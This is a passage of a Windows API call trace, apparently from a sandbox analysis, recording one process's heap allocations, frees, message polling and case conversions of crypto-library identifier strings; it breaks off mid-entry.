RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17844) returned 0x4516010 [0117.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0117.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x17844) returned 0x499a008 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0117.615] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.615] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.615] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0117.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0117.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0117.616] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0117.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0117.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.616] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0117.616] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.617] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0117.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0117.618] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0117.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: 